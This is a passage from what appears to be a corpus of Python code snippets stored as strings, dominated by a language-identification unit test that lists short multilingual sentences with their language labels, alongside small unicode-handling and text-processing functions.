self.assertIsNotNone(course)\r\n\r\n # test that course 'display_name' same as imported course 'display_name'\r\n self.assertEqual(course.display_name, u\"Φυσικά το όνομα Unicode\")", "def test_utf8_cp1252_char_file(self):\n\t\tmain.Main(['input/utf8.txt']).run()\n\t\tself.assertTrue(filecmp.cmp('output/output.csv', 'output/utf8.csv'))", "def to_language(arg: str) -> Tuple[Union[str, None], str]: \n if (low:= arg.lower()) in LANGUAGES:\n return arg\n else:\n return LANGCODES.get(low, None)", "def edits1(self, word):\n splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]\n transposes = [L + R[1] + R[0] + R[2:] for L, R in splits if len(R) > 1]\n replaces = [L + c + R[1:] for L, R in splits if R for c in self.char_set]\n return set(transposes + replaces)", "def lowercase(data):\n return np.char.lower(data)", "def sortby(tree, col, descending): # 重新排序 <-- 文字版\n # grab values to sort\n data = [(tree.set(child, col), child) \\\n for child in tree.get_children('')]\n\n # if the data to be sorted is numeric change to float\n #data = change_numeric(data)\n # now sort the data in place\n data.sort(reverse=descending)\n # 數字的排法(但文字部分就無法排序)\n #data.sort(key=lambda data: int(data[0]), reverse=descending)\n\n for ix, item in enumerate(data):\n tree.move(item[1], '', ix)\n\n # switch the heading so it will sort in the opposite direction\n tree.heading(col, command=lambda col=col: sortby(tree, col, \\\n int(not descending)))", "def lower_case_really():", "def test_unicode_attribute(Script):\n s1 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"e\"\\n\\nPerson().name.')\n completions1 = Script(s1).complete()\n assert 'strip' in [c.name for c in completions1]\n s2 = ('#-*- coding: utf-8 -*-\\nclass Person():\\n'\n ' name = \"é\"\\n\\nPerson().name.')\n completions2 = Script(s2).complete()\n assert 'strip' in [c.name for c in completions2]", "def natsort_key_icase(s):\n return natsort_key(s.lower())", "def use_zh(self):\n pass", "def test_langid_benchmark(basic_multilingual):\n examples = [\n {\"text\": \"contingentiam in naturalibus 
causis.\", \"label\": \"la\"},\n {\"text\": \"I jak opowiadał nieżyjący już pan Czesław\", \"label\": \"pl\"},\n {\"text\": \"Sonera gilt seit längerem als Übernahmekandidat\", \"label\": \"de\"},\n {\"text\": \"与银类似,汞也可以与空气中的硫化氢反应。\", \"label\": \"zh-hans\"},\n {\"text\": \"contradictionem implicat.\", \"label\": \"la\"},\n {\"text\": \"Bis zu Prozent gingen die Offerten etwa im\", \"label\": \"de\"},\n {\"text\": \"inneren Sicherheit vorgeschlagene Ausweitung der\", \"label\": \"de\"},\n {\"text\": \"Multimedia-PDA mit Mini-Tastatur\", \"label\": \"de\"},\n {\"text\": \"Ponášalo sa to na rovnicu o dvoch neznámych.\", \"label\": \"sk\"},\n {\"text\": \"이처럼 앞으로 심판의 그 날에 다시 올 메시아가 예수 그리스도이며 , 그는 모든 인류의\", \"label\": \"ko\"},\n {\"text\": \"Die Arbeitsgruppe bedauert , dass der weit über\", \"label\": \"de\"},\n {\"text\": \"И только раз довелось поговорить с ним не вполне\", \"label\": \"ru\"},\n {\"text\": \"de a-l lovi cu piciorul și conștiința că era\", \"label\": \"ro\"},\n {\"text\": \"relación coas pretensións do demandante e que, nos\", \"label\": \"gl\"},\n {\"text\": \"med petdeset in sedemdeset\", \"label\": \"sl\"},\n {\"text\": \"Catalunya; el Consell Comarcal del Vallès Oriental\", \"label\": \"ca\"},\n {\"text\": \"kunnen worden.\", \"label\": \"nl\"},\n {\"text\": \"Witkin je ve většině ohledů zcela jiný.\", \"label\": \"cs\"},\n {\"text\": \"lernen, so zu agieren, dass sie positive oder auch\", \"label\": \"de\"},\n {\"text\": \"olurmuş...\", \"label\": \"tr\"},\n {\"text\": \"sarcasmo de Altman, desde as «peruas» que discutem\", \"label\": \"pt\"},\n {\"text\": \"خلاف فوجداری مقدمہ درج کرے۔\", \"label\": \"ur\"},\n {\"text\": \"Norddal kommune :\", \"label\": \"no\"},\n {\"text\": \"dem Windows-.-Zeitalter , soll in diesem Jahr\", \"label\": \"de\"},\n {\"text\": \"przeklętych ucieleśniają mit poety-cygana,\", \"label\": \"pl\"},\n {\"text\": \"We do not believe the suspect has ties to this\", \"label\": \"en\"},\n {\"text\": \"groziņu pīšanu.\", \"label\": \"lv\"},\n {\"text\": \"Senior Vice-President David M. Thomas möchte\", \"label\": \"de\"},\n {\"text\": \"neomylně vybral nějakou knihu a začetl se.\", \"label\": \"cs\"},\n {\"text\": \"Statt dessen darf beispielsweise der Browser des\", \"label\": \"de\"},\n {\"text\": \"outubro, alcançando R $ bilhões em .\", \"label\": \"pt\"},\n {\"text\": \"(Porte, ), as it does other disciplines\", \"label\": \"en\"},\n {\"text\": \"uskupení se mylně domnívaly, že podporu\", \"label\": \"cs\"},\n {\"text\": \"Übernahme von Next Ende an dem System herum , das\", \"label\": \"de\"},\n {\"text\": \"No podemos decir a la Hacienda que los alemanes\", \"label\": \"es\"},\n {\"text\": \"и рѣста еи братья\", \"label\": \"orv\"},\n {\"text\": \"الذي اتخذ قرارا بتجميد اعلان الدولة الفلسطينية\", \"label\": \"ar\"},\n {\"text\": \"uurides Rootsi sõjaarhiivist toodud . sajandi\", \"label\": \"et\"},\n {\"text\": \"selskapets penger til å pusse opp sin enebolig på\", \"label\": \"no\"},\n {\"text\": \"средней полосе и севернее в Ярославской,\", \"label\": \"ru\"},\n {\"text\": \"il-massa żejda fil-ġemgħat u superġemgħat ta'\", \"label\": \"mt\"},\n {\"text\": \"The Global Beauties on internetilehekülg, mida\", \"label\": \"et\"},\n {\"text\": \"이스라엘 인들은 하나님이 그 큰 팔을 펴 이집트 인들을 치는 것을 보고 하나님을 두려워하며\", \"label\": \"ko\"},\n {\"text\": \"Snad ještě dodejme jeden ekonomický argument.\", \"label\": \"cs\"},\n {\"text\": \"Spalio d. 
vykusiame pirmajame rinkimų ture\", \"label\": \"lt\"},\n {\"text\": \"und schlechter Journalismus ein gutes Geschäft .\", \"label\": \"de\"},\n {\"text\": \"Du sodiečiai sėdi ant potvynio apsemtų namų stogo.\", \"label\": \"lt\"},\n {\"text\": \"цей є автентичним.\", \"label\": \"uk\"},\n {\"text\": \"Și îndegrabă fu cu îngerul mulțime de șireaguri\", \"label\": \"ro\"},\n {\"text\": \"sobra personal cualificado.\", \"label\": \"es\"},\n {\"text\": \"Tako se u Njemačkoj dvije trećine liječnika služe\", \"label\": \"hr\"},\n {\"text\": \"Dual-Athlon-Chipsatz noch in diesem Jahr\", \"label\": \"de\"},\n {\"text\": \"यहां तक कि चीन के चीफ ऑफ जनरल स्टाफ भी भारत का\", \"label\": \"hi\"},\n {\"text\": \"Li forestier du mont avale\", \"label\": \"fro\"},\n {\"text\": \"Netzwerken für Privatanwender zu bewundern .\", \"label\": \"de\"},\n {\"text\": \"만해는 승적을 가진 중이 결혼할 수 없다는 불교의 계율을 시대에 맞지 않는 것으로 보았다\", \"label\": \"ko\"},\n {\"text\": \"balance and weight distribution but not really for\", \"label\": \"en\"},\n {\"text\": \"og så e # tente vi opp den om morgonen å sfyrte\", \"label\": \"nn\"},\n {\"text\": \"변화는 의심의 여지가 없는 것이지만 반면에 진화는 논쟁의 씨앗이다 .\", \"label\": \"ko\"},\n {\"text\": \"puteare fac aceastea.\", \"label\": \"ro\"},\n {\"text\": \"Waitt seine Führungsmannschaft nicht dem\", \"label\": \"de\"},\n {\"text\": \"juhtimisega, tulid sealt.\", \"label\": \"et\"},\n {\"text\": \"Veränderungen .\", \"label\": \"de\"},\n {\"text\": \"banda en el Bayer Leverkusen de la Bundesliga de\", \"label\": \"es\"},\n {\"text\": \"В туже зиму посла всеволодъ сн҃а своѥго ст҃ослава\", \"label\": \"orv\"},\n {\"text\": \"пославъ приведе я мастеры ѿ грекъ\", \"label\": \"orv\"},\n {\"text\": \"En un nou escenari difícil d'imaginar fa poques\", \"label\": \"ca\"},\n {\"text\": \"καὶ γὰρ τινὲς αὐτοὺς εὐεργεσίαι εἶχον ἐκ Κροίσου\", \"label\": \"grc\"},\n {\"text\": \"직접적인 관련이 있다 .\", \"label\": \"ko\"},\n {\"text\": \"가까운 듯하면서도 멀다 .\", \"label\": \"ko\"},\n {\"text\": \"Er bietet ein ähnliches Leistungsniveau und\", \"label\": \"de\"},\n {\"text\": \"民都洛水牛是獨居的,並不會以群族聚居。\", \"label\": \"zh-hant\"},\n {\"text\": \"την τρομοκρατία.\", \"label\": \"el\"},\n {\"text\": \"hurbiltzen diren neurrian.\", \"label\": \"eu\"},\n {\"text\": \"Ah dimenticavo, ma tutta sta caciara per fare un\", \"label\": \"it\"},\n {\"text\": \"На первом этапе (-) прошла так называемая\", \"label\": \"ru\"},\n {\"text\": \"of games are on the market.\", \"label\": \"en\"},\n {\"text\": \"находится Мост дружбы, соединяющий узбекский и\", \"label\": \"ru\"},\n {\"text\": \"lessié je voldroie que li saint fussent aporté\", \"label\": \"fro\"},\n {\"text\": \"Дошла очередь и до Гималаев.\", \"label\": \"ru\"},\n {\"text\": \"vzácným suknem táhly pouští, si jednou chtěl do\", \"label\": \"cs\"},\n {\"text\": \"E no terceiro tipo sitúa a familias (%), nos que a\", \"label\": \"gl\"},\n {\"text\": \"وجابت دوريات امريكية وعراقية شوارع المدينة، فيما\", \"label\": \"ar\"},\n {\"text\": \"Jeg har bodd her i år .\", \"label\": \"no\"},\n {\"text\": \"Pohrozil, že odbory zostří postoj, pokud se\", \"label\": \"cs\"},\n {\"text\": \"tinham conseguido.\", \"label\": \"pt\"},\n {\"text\": \"Nicht-Erkrankten einen Anfangsverdacht für einen\", \"label\": \"de\"},\n {\"text\": \"permanece em aberto.\", \"label\": \"pt\"},\n {\"text\": \"questi possono promettere rendimenti fino a un\", \"label\": \"it\"},\n {\"text\": \"Tema juurutatud kahevedurisüsteemita oleksid\", \"label\": \"et\"},\n {\"text\": \"Поведение внешне простой игрушки оказалось\", \"label\": 
\"ru\"},\n {\"text\": \"Bundesländern war vom Börsenverein des Deutschen\", \"label\": \"de\"},\n {\"text\": \"acció, 'a mesura que avanci l'estiu, amb l'augment\", \"label\": \"ca\"},\n {\"text\": \"Dove trovare queste risorse? Jay Naidoo, ministro\", \"label\": \"it\"},\n {\"text\": \"essas gordurinhas.\", \"label\": \"pt\"},\n {\"text\": \"Im zweiten Schritt sollen im übernächsten Jahr\", \"label\": \"de\"},\n {\"text\": \"allveelaeva pole enam vaja, kuna külm sõda on läbi\", \"label\": \"et\"},\n {\"text\": \"उपद्रवी दुकानों को लूटने के साथ ही उनमें आग लगा\", \"label\": \"hi\"},\n {\"text\": \"@user nella sfortuna sei fortunata ..\", \"label\": \"it\"},\n {\"text\": \"математических школ в виде грозовых туч.\", \"label\": \"ru\"},\n {\"text\": \"No cambiaremos nunca nuestra forma de jugar por un\", \"label\": \"es\"},\n {\"text\": \"dla tej klasy ani wymogów minimalnych, z wyjątkiem\", \"label\": \"pl\"},\n {\"text\": \"en todo el mundo, mientras que en España consiguió\", \"label\": \"es\"},\n {\"text\": \"политики считать надежное обеспечение военной\", \"label\": \"ru\"},\n {\"text\": \"gogoratzen du, genio alemana delakoaren\", \"label\": \"eu\"},\n {\"text\": \"Бычий глаз.\", \"label\": \"ru\"},\n {\"text\": \"Opeření se v pravidelných obdobích obnovuje\", \"label\": \"cs\"},\n {\"text\": \"I no és només la seva, es tracta d'una resposta\", \"label\": \"ca\"},\n {\"text\": \"오경을 가르쳤다 .\", \"label\": \"ko\"},\n {\"text\": \"Nach der so genannten Start-up-Periode vergibt die\", \"label\": \"de\"},\n {\"text\": \"Saulista huomasi jo lapsena , että hänellä on\", \"label\": \"fi\"},\n {\"text\": \"Министерство культуры сочло нецелесообразным, и\", \"label\": \"ru\"},\n {\"text\": \"znepřátelené tábory v Tádžikistánu předseda\", \"label\": \"cs\"},\n {\"text\": \"καὶ ἦν ὁ λαὸς προσδοκῶν τὸν Ζαχαρίαν καὶ ἐθαύμαζον\", \"label\": \"grc\"},\n {\"text\": \"Вечером, в продукте, этот же человек говорил о\", \"label\": \"ru\"},\n {\"text\": \"lugar á formación de xuizos máis complexos.\", \"label\": \"gl\"},\n {\"text\": \"cheaper, in the end?\", \"label\": \"en\"},\n {\"text\": \"الوزارة في شأن صفقات بيع الشركات العامة التي تم\", \"label\": \"ar\"},\n {\"text\": \"tärkeintä elämässäni .\", \"label\": \"fi\"},\n {\"text\": \"Виконання Мінських угод було заблоковано Росією та\", \"label\": \"uk\"},\n {\"text\": \"Aby szybko rozpoznać żołnierzy desantu, należy\", \"label\": \"pl\"},\n {\"text\": \"Bankengeschäfte liegen vorn , sagte Strothmann .\", \"label\": \"de\"},\n {\"text\": \"продолжение работы.\", \"label\": \"ru\"},\n {\"text\": \"Metro AG plant Online-Offensive\", \"label\": \"de\"},\n {\"text\": \"nu vor veni, și să vor osîndi, aceia nu pot porni\", \"label\": \"ro\"},\n {\"text\": \"Ich denke , es geht in Wirklichkeit darum , NT bei\", \"label\": \"de\"},\n {\"text\": \"de turism care încasează contravaloarea\", \"label\": \"ro\"},\n {\"text\": \"Aurkaria itotzea da helburua, baloia lapurtu eta\", \"label\": \"eu\"},\n {\"text\": \"com a centre de formació en Tecnologies de la\", \"label\": \"ca\"},\n {\"text\": \"oportet igitur quod omne agens in agendo intendat\", \"label\": \"la\"},\n {\"text\": \"Jerzego Andrzejewskiego, oparty na chińskich\", \"label\": \"pl\"},\n {\"text\": \"sau một vài câu chuyện xã giao không dính dáng tới\", \"label\": \"vi\"},\n {\"text\": \"что экономическому прорыву жесткий авторитарный\", \"label\": \"ru\"},\n {\"text\": \"DRAM-Preisen scheinen DSPs ein\", \"label\": \"de\"},\n {\"text\": \"Jos dajan nubbái: Mana!\", \"label\": \"sme\"},\n {\"text\": 
\"toți carii ascultară de el să răsipiră.\", \"label\": \"ro\"},\n {\"text\": \"odpowiedzialności, które w systemie własności\", \"label\": \"pl\"},\n {\"text\": \"Dvomesečno potovanje do Mollenda v Peruju je\", \"label\": \"sl\"},\n {\"text\": \"d'entre les agències internacionals.\", \"label\": \"ca\"},\n {\"text\": \"Fahrzeugzugangssysteme gefertigt und an viele\", \"label\": \"de\"},\n {\"text\": \"in an answer to the sharers' petition in Cuthbert\", \"label\": \"en\"},\n {\"text\": \"Europa-Domain per Verordnung zu regeln .\", \"label\": \"de\"},\n {\"text\": \"#Balotelli. Su ebay prezzi stracciati per Silvio\", \"label\": \"it\"},\n {\"text\": \"Ne na košickém trávníku, ale už včera v letadle se\", \"label\": \"cs\"},\n {\"text\": \"zaměstnanosti a investičních strategií.\", \"label\": \"cs\"},\n {\"text\": \"Tatínku, udělej den\", \"label\": \"cs\"},\n {\"text\": \"frecuencia con Mary.\", \"label\": \"es\"},\n {\"text\": \"Свеаборге.\", \"label\": \"ru\"},\n {\"text\": \"opatření slovenské strany o certifikaci nejvíce\", \"label\": \"cs\"},\n {\"text\": \"En todas me decían: 'Espera que hagamos un estudio\", \"label\": \"es\"},\n {\"text\": \"Die Demonstration sollte nach Darstellung der\", \"label\": \"de\"},\n {\"text\": \"Ci vorrà un assoluto rigore se dietro i disavanzi\", \"label\": \"it\"},\n {\"text\": \"Tatínku, víš, že Honzovi odešla maminka?\", \"label\": \"cs\"},\n {\"text\": \"Die Anzahl der Rechner wuchs um % auf und die\", \"label\": \"de\"},\n {\"text\": \"האמריקאית על אדמת סעודיה עלולה לסבך את ישראל, אין\", \"label\": \"he\"},\n {\"text\": \"Volán Egyesülés, a Közlekedési Főfelügyelet is.\", \"label\": \"hu\"},\n {\"text\": \"Schejbala, který stejnou hru s velkým úspěchem\", \"label\": \"cs\"},\n {\"text\": \"depends on the data type of the field.\", \"label\": \"en\"},\n {\"text\": \"Umsatzwarnung zu Wochenbeginn zeitweise auf ein\", \"label\": \"de\"},\n {\"text\": \"niin heti nukun .\", \"label\": \"fi\"},\n {\"text\": \"Mobilfunkunternehmen gegen die Anwendung der so\", \"label\": \"de\"},\n {\"text\": \"sapessi le intenzioni del governo Monti e dell'UE\", \"label\": \"it\"},\n {\"text\": \"Di chi è figlia Martine Aubry?\", \"label\": \"it\"},\n {\"text\": \"avec le reste du monde.\", \"label\": \"fr\"},\n {\"text\": \"Այդ մաքոքը ինքնին նոր չէ, աշխարհը արդեն մի քանի\", \"label\": \"hy\"},\n {\"text\": \"și în cazul destrămării cenaclului.\", \"label\": \"ro\"},\n {\"text\": \"befriedigen kann , und ohne die auftretenden\", \"label\": \"de\"},\n {\"text\": \"Κύκνον τ̓ ἐξεναρεῖν καὶ ἀπὸ κλυτὰ τεύχεα δῦσαι.\", \"label\": \"grc\"},\n {\"text\": \"færdiguddannede.\", \"label\": \"da\"},\n {\"text\": \"Schmidt war Sohn eines Rittergutsbesitzers.\", \"label\": \"de\"},\n {\"text\": \"и вдаша попадь ѡпрати\", \"label\": \"orv\"},\n {\"text\": \"cine nu știe învățătură”.\", \"label\": \"ro\"},\n {\"text\": \"détacha et cette dernière tenta de tuer le jeune\", \"label\": \"fr\"},\n {\"text\": \"Der har saka også ei lengre forhistorie.\", \"label\": \"nn\"},\n {\"text\": \"Pieprz roztłuc w moździerzu, dodać do pasty,\", \"label\": \"pl\"},\n {\"text\": \"Лежа за гребнем оврага, как за бруствером, Ушаков\", \"label\": \"ru\"},\n {\"text\": \"gesucht habe, vielen Dank nochmals!\", \"label\": \"de\"},\n {\"text\": \"инструментальных сталей, повышения\", \"label\": \"ru\"},\n {\"text\": \"im Halbfinale Patrick Smith und im Finale dann\", \"label\": \"de\"},\n {\"text\": \"البنوك التريث في منح تسهيلات جديدة لمنتجي حديد\", \"label\": \"ar\"},\n {\"text\": \"una bolsa ventral, la 
cual se encuentra debajo de\", \"label\": \"es\"},\n {\"text\": \"za SETimes.\", \"label\": \"sr\"},\n {\"text\": \"de Irak, a un piloto italiano que había violado el\", \"label\": \"es\"},\n {\"text\": \"Er könne sich nicht erklären , wie die Zeitung auf\", \"label\": \"de\"},\n {\"text\": \"Прохорова.\", \"label\": \"ru\"},\n {\"text\": \"la democrazia perde sulla tecnocrazia? #\", \"label\": \"it\"},\n {\"text\": \"entre ambas instituciones, confirmó al medio que\", \"label\": \"es\"},\n {\"text\": \"Austlandet, vart det funne om lag førti\", \"label\": \"nn\"},\n {\"text\": \"уровнями власти.\", \"label\": \"ru\"},\n {\"text\": \"Dá tedy primáři úplatek, a často ne malý.\", \"label\": \"cs\"},\n {\"text\": \"brillantes del acto, al llevar a cabo en el\", \"label\": \"es\"},\n {\"text\": \"eee druga zadeva je majhen priročen gre kamorkoli\", \"label\": \"sl\"},\n {\"text\": \"Das ATX-Board paßt in herkömmliche PC-ATX-Gehäuse\", \"label\": \"de\"},\n {\"text\": \"Za vodné bylo v prvním pololetí zaplaceno v ČR\", \"label\": \"cs\"},\n {\"text\": \"Даже на полсантиметра.\", \"label\": \"ru\"},\n {\"text\": \"com la del primer tinent d'alcalde en funcions,\", \"label\": \"ca\"},\n {\"text\": \"кількох оповідань в цілості — щось на зразок того\", \"label\": \"uk\"},\n {\"text\": \"sed ad divitias congregandas, vel superfluum\", \"label\": \"la\"},\n {\"text\": \"Norma Talmadge, spela mot Valentino i en version\", \"label\": \"sv\"},\n {\"text\": \"Dlatego chciał się jej oświadczyć w niezwykłym\", \"label\": \"pl\"},\n {\"text\": \"будут выступать на одинаковых снарядах.\", \"label\": \"ru\"},\n {\"text\": \"Orang-orang terbunuh di sana.\", \"label\": \"id\"},\n {\"text\": \"لدى رايت شقيق اسمه أوسكار, وهو يعمل كرسام للكتب\", \"label\": \"ar\"},\n {\"text\": \"Wirklichkeit verlagerten und kaum noch\", \"label\": \"de\"},\n {\"text\": \"как перемешивают костяшки перед игрой в домино, и\", \"label\": \"ru\"},\n {\"text\": \"В средине дня, когда солнце светило в нашу\", \"label\": \"ru\"},\n {\"text\": \"d'aventure aux rôles de jeune romantique avec une\", \"label\": \"fr\"},\n {\"text\": \"My teď hledáme organizace, jež by s námi chtěly\", \"label\": \"cs\"},\n {\"text\": \"Urteilsfähigkeit einbüßen , wenn ich eigene\", \"label\": \"de\"},\n {\"text\": \"sua appartenenza anche a voci diverse da quella in\", \"label\": \"it\"},\n {\"text\": \"Aufträge dieses Jahr verdoppeln werden .\", \"label\": \"de\"},\n {\"text\": \"M.E.: Miała szanse mnie odnaleźć, gdyby naprawdę\", \"label\": \"pl\"},\n {\"text\": \"secundum contactum virtutis, cum careat dimensiva\", \"label\": \"la\"},\n {\"text\": \"ezinbestekoa dela esan zuen.\", \"label\": \"eu\"},\n {\"text\": \"Anek hurbiltzeko eskatzen zion besaulkitik, eta\", \"label\": \"eu\"},\n {\"text\": \"perfectius alio videat, quamvis uterque videat\", \"label\": \"la\"},\n {\"text\": \"Die Strecke war anspruchsvoll und führte unter\", \"label\": \"de\"},\n {\"text\": \"саморазоблачительным уроком, западные СМИ не\", \"label\": \"ru\"},\n {\"text\": \"han representerer radikal islamisme .\", \"label\": \"no\"},\n {\"text\": \"Què s'hi respira pel que fa a la reforma del\", \"label\": \"ca\"},\n {\"text\": \"previsto para também ser desconstruido.\", \"label\": \"pt\"},\n {\"text\": \"Ὠκεανοῦ βαθυκόλποις ἄνθεά τ̓ αἰνυμένην, ῥόδα καὶ\", \"label\": \"grc\"},\n {\"text\": \"para jovens de a anos nos Cieps.\", \"label\": \"pt\"},\n {\"text\": \"संघर्ष को अंजाम तक पहुंचाने का ऐलान किया है ।\", \"label\": \"hi\"},\n {\"text\": \"objeví i u nás.\", \"label\": 
\"cs\"},\n {\"text\": \"kvitteringer.\", \"label\": \"da\"},\n {\"text\": \"This report is no exception.\", \"label\": \"en\"},\n {\"text\": \"Разлепват доносниците до избирателните списъци\", \"label\": \"bg\"},\n {\"text\": \"anderem ihre Bewegungsfreiheit in den USA\", \"label\": \"de\"},\n {\"text\": \"Ñu tegoon ca kaw gor ña ay njotti bopp yu kenn\", \"label\": \"wo\"},\n {\"text\": \"Struktur kann beispielsweise der Schwerpunkt mehr\", \"label\": \"de\"},\n {\"text\": \"% la velocidad permitida, la sanción es muy grave.\", \"label\": \"es\"},\n {\"text\": \"Teles-Einstieg in ADSL-Markt\", \"label\": \"de\"},\n {\"text\": \"ettekäändeks liiga suure osamaksu.\", \"label\": \"et\"},\n {\"text\": \"als Indiz für die geänderte Marktpolitik des\", \"label\": \"de\"},\n {\"text\": \"quod quidem aperte consequitur ponentes\", \"label\": \"la\"},\n {\"text\": \"de negociación para el próximo de junio.\", \"label\": \"es\"},\n {\"text\": \"Tyto důmyslné dekorace doznaly v poslední době\", \"label\": \"cs\"},\n {\"text\": \"največjega uspeha doslej.\", \"label\": \"sl\"},\n {\"text\": \"Paul Allen je jedan od suosnivača Interval\", \"label\": \"hr\"},\n {\"text\": \"Federal (Seac / DF) eo Sindicato das Empresas de\", \"label\": \"pt\"},\n {\"text\": \"Quartal mit . Mark gegenüber dem gleichen Quartal\", \"label\": \"de\"},\n {\"text\": \"otros clubes y del Barça B saldrán varios\", \"label\": \"es\"},\n {\"text\": \"Jaskula (Pol.) -\", \"label\": \"cs\"},\n {\"text\": \"umožnily říci, že je možné přejít k mnohem\", \"label\": \"cs\"},\n {\"text\": \"اعلن الجنرال تومي فرانكس قائد القوات الامريكية\", \"label\": \"ar\"},\n {\"text\": \"Telekom-Chef Ron Sommer und der Vorstandssprecher\", \"label\": \"de\"},\n {\"text\": \"My, jako průmyslový a finanční holding, můžeme\", \"label\": \"cs\"},\n {\"text\": \"voorlichting onder andere betrekking kan hebben:\", \"label\": \"nl\"},\n {\"text\": \"Hinrichtung geistig Behinderter applaudiert oder\", \"label\": \"de\"},\n {\"text\": \"wie beispielsweise Anzahl erzielte Klicks ,\", \"label\": \"de\"},\n {\"text\": \"Intel-PC-SDRAM-Spezifikation in der Version . 
(\", \"label\": \"de\"},\n {\"text\": \"plângere în termen de zile de la comunicarea\", \"label\": \"ro\"},\n {\"text\": \"и Испания ще изгубят втория си комисар в ЕК.\", \"label\": \"bg\"},\n {\"text\": \"इसके चलते इस आदिवासी जनजाति का क्षरण हो रहा है ।\", \"label\": \"hi\"},\n {\"text\": \"aunque se mostró contrario a establecer un\", \"label\": \"es\"},\n {\"text\": \"des letzten Jahres von auf Millionen Euro .\", \"label\": \"de\"},\n {\"text\": \"Ankara se također poziva da u cijelosti ratificira\", \"label\": \"hr\"},\n {\"text\": \"herunterlädt .\", \"label\": \"de\"},\n {\"text\": \"стрессовую ситуацию для организма, каковой\", \"label\": \"ru\"},\n {\"text\": \"Státního shromáždění (parlamentu).\", \"label\": \"cs\"},\n {\"text\": \"diskutieren , ob und wie dieser Dienst weiterhin\", \"label\": \"de\"},\n {\"text\": \"Verbindungen zu FPÖ-nahen Polizisten gepflegt und\", \"label\": \"de\"},\n {\"text\": \"Pražského volebního lídra ovšem nevybírá Miloš\", \"label\": \"cs\"},\n {\"text\": \"Nach einem Bericht der Washington Post bleibt das\", \"label\": \"de\"},\n {\"text\": \"للوضع آنذاك، لكني في قرارة نفسي كنت سعيداً لما\", \"label\": \"ar\"},\n {\"text\": \"не желаят запазването на статуквото.\", \"label\": \"bg\"},\n {\"text\": \"Offenburg gewesen .\", \"label\": \"de\"},\n {\"text\": \"ἐὰν ὑμῖν εἴπω οὐ μὴ πιστεύσητε\", \"label\": \"grc\"},\n {\"text\": \"all'odiato compagno di squadra Prost, il quale\", \"label\": \"it\"},\n {\"text\": \"historischen Gänselieselbrunnens.\", \"label\": \"de\"},\n {\"text\": \"למידע מלווייני הריגול האמריקאיים העוקבים אחר\", \"label\": \"he\"},\n {\"text\": \"οὐδὲν ἄρα διαφέρεις Ἀμάσιος τοῦ Ἠλείου, ὃν\", \"label\": \"grc\"},\n {\"text\": \"movementos migratorios.\", \"label\": \"gl\"},\n {\"text\": \"Handy und ein Spracherkennungsprogramm sämtliche\", \"label\": \"de\"},\n {\"text\": \"Kümne aasta jooksul on Eestisse ohjeldamatult\", \"label\": \"et\"},\n {\"text\": \"H.G. Bücknera.\", \"label\": \"pl\"},\n {\"text\": \"protiv krijumčarenja, ili pak traženju ukidanja\", \"label\": \"hr\"},\n {\"text\": \"Topware-Anteile mehrere Millionen Mark gefordert\", \"label\": \"de\"},\n {\"text\": \"Maar de mensen die nu over Van Dijk bij FC Twente\", \"label\": \"nl\"},\n {\"text\": \"poidan experimentar as percepcións do interesado,\", \"label\": \"gl\"},\n {\"text\": \"Miał przecież w kieszeni nóż.\", \"label\": \"pl\"},\n {\"text\": \"Avšak žádná z nich nepronikla za hranice přímé\", \"label\": \"cs\"},\n {\"text\": \"esim. 
helpottamalla luottoja muiden\", \"label\": \"fi\"},\n {\"text\": \"Podle předběžných výsledků zvítězila v\", \"label\": \"cs\"},\n {\"text\": \"Nicht nur das Web-Frontend , auch die\", \"label\": \"de\"},\n {\"text\": \"Regierungsinstitutionen oder Universitäten bei\", \"label\": \"de\"},\n {\"text\": \"Խուլեն Լոպետեգիին, պատճառաբանելով, որ վերջինս\", \"label\": \"hy\"},\n {\"text\": \"Афганистана, где в последние дни идут ожесточенные\", \"label\": \"ru\"},\n {\"text\": \"лѧхове же не идоша\", \"label\": \"orv\"},\n {\"text\": \"Mit Hilfe von IBMs Chip-Management-Systemen sollen\", \"label\": \"de\"},\n {\"text\": \", als Manager zu Telefonica zu wechseln .\", \"label\": \"de\"},\n {\"text\": \"którym zajmuje się człowiek, zmienia go i pozwala\", \"label\": \"pl\"},\n {\"text\": \"činí kyperských liber, to je asi USD.\", \"label\": \"cs\"},\n {\"text\": \"Studienplätze getauscht werden .\", \"label\": \"de\"},\n {\"text\": \"учёных, орнитологов признают вид.\", \"label\": \"ru\"},\n {\"text\": \"acordare a concediilor prevăzute de legislațiile\", \"label\": \"ro\"},\n {\"text\": \"at større innsats for fornybar, berekraftig energi\", \"label\": \"nn\"},\n {\"text\": \"Politiet veit ikkje kor mange personar som deltok\", \"label\": \"nn\"},\n {\"text\": \"offentligheten av unge , sinte menn som har\", \"label\": \"no\"},\n {\"text\": \"însuși în jurul lapunei, care încet DISPARE în\", \"label\": \"ro\"},\n {\"text\": \"O motivo da decisão é evitar uma sobrecarga ainda\", \"label\": \"pt\"},\n {\"text\": \"El Apostolado de la prensa contribuye en modo\", \"label\": \"es\"},\n {\"text\": \"Teltow ( Kreis Teltow-Fläming ) ist Schmitt einer\", \"label\": \"de\"},\n {\"text\": \"grozījumus un iesniegt tos Apvienoto Nāciju\", \"label\": \"lv\"},\n {\"text\": \"Gestalt einer deutschen Nationalmannschaft als\", \"label\": \"de\"},\n {\"text\": \"D überholt zu haben , konterte am heutigen Montag\", \"label\": \"de\"},\n {\"text\": \"Softwarehersteller Oracle hat im dritten Quartal\", \"label\": \"de\"},\n {\"text\": \"Během nich se ekonomické podmínky mohou radikálně\", \"label\": \"cs\"},\n {\"text\": \"Dziki kot w górach zeskakuje z kamienia.\", \"label\": \"pl\"},\n {\"text\": \"Ačkoliv ligový nováček prohrál, opět potvrdil, že\", \"label\": \"cs\"},\n {\"text\": \"des Tages , Portraits internationaler Stars sowie\", \"label\": \"de\"},\n {\"text\": \"Communicator bekannt wurde .\", \"label\": \"de\"},\n {\"text\": \"τῷ δ’ ἄρα καὶ αὐτῷ ἡ γυνή ἐπίτεξ ἐοῦσα πᾶσαν\", \"label\": \"grc\"},\n {\"text\": \"Triadú tenia, mentre redactava 'Dies de memòria',\", \"label\": \"ca\"},\n {\"text\": \"دسته‌جمعی در درخشندگی ماه سیم‌گون زمزمه ستاینده و\", \"label\": \"fa\"},\n {\"text\": \"Книгу, наполненную мелочной заботой об одежде,\", \"label\": \"ru\"},\n {\"text\": \"putares canem leporem persequi.\", \"label\": \"la\"},\n {\"text\": \"В дальнейшем эта яркость слегка померкла, но в\", \"label\": \"ru\"},\n {\"text\": \"offizielles Verfahren gegen die Telekom\", \"label\": \"de\"},\n {\"text\": \"podrían haber sido habitantes 